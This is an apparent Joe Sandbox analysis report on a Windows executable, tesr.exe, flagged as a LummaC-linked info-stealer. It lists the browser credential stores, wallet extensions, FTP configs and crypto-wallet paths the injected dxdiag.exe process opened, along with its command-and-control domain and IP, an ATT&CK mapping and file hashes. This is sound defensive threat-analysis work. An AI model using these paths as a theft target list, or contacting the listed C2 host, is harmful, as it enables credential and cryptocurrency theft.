                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: Yara matchFile source: 00000002.00000003.2241070978.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 5392, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 5392, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                311
                Process Injection
                11
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                311
                Process Injection
                LSASS Memory121
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager11
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS1
                Process Discovery
                Distributed Component Object Model2
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                tesr.exe35%VirustotalBrowse
                tesr.exe29%ReversingLabs
                tesr.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://mutterunurse.click/j0%Avira URL Cloudsafe
                https://mutterunurse.click/api0%Avira URL Cloudsafe
                https://mutterunurse.click/apie0%Avira URL Cloudsafe
                https://mutterunurse.click/0%Avira URL Cloudsafe
                https://mutterunurse.click/L0%Avira URL Cloudsafe
                https://mutterunurse.click/A0%Avira URL Cloudsafe
                mutterunurse.click0%Avira URL Cloudsafe
                https://mutterunurse.click/api_0%Avira URL Cloudsafe
                https://mutterunurse.click:443/api0%Avira URL Cloudsafe
                https://mutterunurse.click/Q0%Avira URL Cloudsafe
                https://mutterunurse.click/apivR0%Avira URL Cloudsafe
                https://mutterunurse.click/b0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                199.232.214.172
                truefalse
                  high
                  mutterunurse.click
                  104.21.90.18
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    dare-curbys.bizfalse
                      high
                      impend-differ.bizfalse
                        high
                        mutterunurse.clicktrue
                        • Avira URL Cloud: safe
                        unknown
                        covery-mover.bizfalse
                          high
                          https://mutterunurse.click/apitrue
                          • Avira URL Cloud: safe
                          unknown
                          dwell-exclaim.bizfalse
                            high
                            zinc-sneark.bizfalse
                              high
                              formy-spill.bizfalse
                                high
                                se-blurry.bizfalse
                                  high
                                  print-vexer.bizfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabdxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://mutterunurse.click/jdxdiag.exe, 00000002.00000003.2288285003.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289289481.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/ac/?q=dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icodxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://mutterunurse.click/dxdiag.exe, 00000002.00000003.2209512428.000000000500C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2278524685.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://mutterunurse.click/apiedxdiag.exe, 00000002.00000003.2224525421.000000000501E000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224841744.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224436080.000000000501B000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2225377449.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2226346264.0000000005021000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYidxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.dxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://mutterunurse.click/api_dxdiag.exe, 00000002.00000003.2262186574.000000000500F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2237965926.000000000500F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2261930463.000000000500C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2251040585.0000000005011000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ocsp.rootca1.amazontrust.com0:dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://mutterunurse.click/Adxdiag.exe, 00000002.00000003.2240921118.0000000005022000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2251040585.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2239478696.0000000005022000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2238186286.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2237874580.000000000501C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.ecosia.org/newtab/dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctadxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brdxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ac.ecosia.org/autocomplete?q=dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://mutterunurse.click/Ldxdiag.exe, 00000002.00000002.2289289481.0000000002BD5000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2288285003.0000000002BD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgdxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgdxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://mutterunurse.click/Qdxdiag.exe, 00000002.00000003.2224525421.000000000501E000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224841744.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224436080.000000000501B000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2225377449.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2226346264.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2237874580.000000000501C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://x1.c.lencr.org/0dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.i.lencr.org/0dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refdxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://mutterunurse.click:443/apidxdiag.exe, 00000002.00000003.2224600032.000000000500E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477dxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://mutterunurse.click/apivRdxdiag.exe, 00000002.00000003.2288285003.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289289481.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://support.mozilla.org/products/firefoxgro.alldxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://mutterunurse.click/bdxdiag.exe, 00000002.00000003.2288285003.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289289481.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  104.21.90.18
                                                                                  mutterunurse.clickUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1589840
                                                                                  Start date and time:2025-01-13 08:33:18 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 5m 22s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:5
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:tesr.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 51%
                                                                                  • Number of executed functions: 33
                                                                                  • Number of non-executed functions: 103
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 40.126.32.133, 20.190.160.14, 40.126.32.140, 40.126.32.134, 40.126.32.138, 40.126.32.72, 40.126.32.136, 40.126.32.68, 13.107.246.45, 20.109.210.53
                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                  • Execution Graph export aborted for target tesr.exe, PID 2380 because there are no executed function
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  TimeTypeDescription
                                                                                  02:34:24API Interceptor8x Sleep call for process: dxdiag.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.21.90.18setup.exeGet hashmaliciousLummaCBrowse
                                                                                    bFZYRLnRIz.exeGet hashmaliciousLummaC, DCRat, LummaC StealerBrowse
                                                                                      GlobalCheats.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        bg.microsoft.map.fastly.nethttps://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5DkGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        http://satelite.nv-ec.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        https://support.te-wt.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        https://www.flndmy.er-xu.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        https://www.support.ue-vt.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        https://support.wt-nx.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        https://www.maps.tv-wt.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        https://htpss-encontrar.bicicletasraper.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSWSLRT.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.134.197
                                                                                        msit.msiGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.134.197
                                                                                        Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.13.205
                                                                                        trow.exeGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.3
                                                                                        https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5DkGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.40.50
                                                                                        g3.elfGet hashmaliciousUnknownBrowse
                                                                                        • 1.1.1.1
                                                                                        g5.elfGet hashmaliciousUnknownBrowse
                                                                                        • 1.1.1.1
                                                                                        rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.12.205
                                                                                        https://app-nadexlxogi.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                        • 172.64.151.8
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.90.18
                                                                                        msit.msiGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.90.18
                                                                                        PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.90.18
                                                                                        PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.90.18
                                                                                        L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.90.18
                                                                                        sE5IdDeTp2.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.90.18
                                                                                        NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.90.18
                                                                                        g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.90.18
                                                                                        lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.90.18
                                                                                        UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                        • 104.21.90.18
                                                                                        No context
                                                                                        No created / dropped files found
                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Entropy (8bit):7.77469193495392
                                                                                        TrID:
                                                                                        • Win64 Executable GUI (202006/5) 91.80%
                                                                                        • Win64 Executable (generic) (12005/4) 5.46%
                                                                                        • Clipper DOS Executable (2020/12) 0.92%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.91%
                                                                                        • DOS Executable Generic (2002/1) 0.91%
                                                                                        File name:tesr.exe
                                                                                        File size:12'735'488 bytes
                                                                                        MD5:4f96b4d0061d45b08d73e3526d82630f
                                                                                        SHA1:15d6d2445d55db393adf30f0bf7f4b649c098257
                                                                                        SHA256:30bc5b4729f0ae6ea5e1eb44654e739040f29941b5e6d2436b10ae93a98e5e6b
                                                                                        SHA512:6b50eb6e642adb840497b95e0dd5248054752027c15627c2a6262a4e7497c78d1a7eb7b1936c7d8c6f94557b99fcb465e5514f707e04f5f7cc1efee69216a372
                                                                                        SSDEEP:393216:R34OXjrnjnEEQWbPbqeQ2K3G/JXa42gqf:R4I/njtQOr50Sqf
                                                                                        TLSH:2CD6E1187E77EDCAB03DD022C61516334EB1A51C4625EEFA72E61794EE0B4127FCA278
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...q.Xg.........."..................n.........@.....................................f....`........................................
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x140066e18
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                        Time Stamp:0x6758B071 [Tue Dec 10 21:19:45 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
